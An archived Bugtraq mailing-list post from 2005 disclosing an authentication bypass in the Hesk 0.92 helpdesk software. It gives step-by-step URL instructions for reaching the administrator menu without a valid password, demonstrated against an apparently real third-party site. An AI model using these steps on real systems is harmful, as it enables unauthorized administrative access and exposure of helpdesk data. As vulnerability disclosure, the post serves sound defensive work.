Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Vulnerability in Helpdesk software Hesk 0.92

from [s2b] Network Security [Permanent Link]
Subject: Vulnerability in Helpdesk software Hesk 0.92
Date: 29 Aug 2005 12:26:14 -0000 
By The Name Of Allah

Vulnerability in Helpdesk software Hesk ..

Vulnerability Type : Login into The Administrator Menu With out Password

Injected version : Helpdesk software Hesk 0.92

Vulnerability Example

http://www.springporttwppd.com/helpdesk/

add : admin.php

http://www.springporttwppd.com/helpdesk/admin.php

Choose the username : administrator

Put any password in the password field

change the url to : admin_main.php

http://www.springporttwppd.com/helpdesk/admin_main.php

You Are Noe in the Administrator menu ..

Thx For  : Devil-00 & ADBUCTER

Peace
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: unload event in ie/mozilla/opera, gegegz
Next by Date:  WASC-Articles: 'Preventing Log Evasion in IIS', contact
Previous by Thread:  SimplePHPBlog Arbitrary File Deletion and Sample Exploit, 'ken'@FTU
Next by Thread:  Re: Vulnerability in Helpdesk software Hesk 0.92, Thomas Krüger
Indexes:  [Date] [Thread] [Top] [All Lists]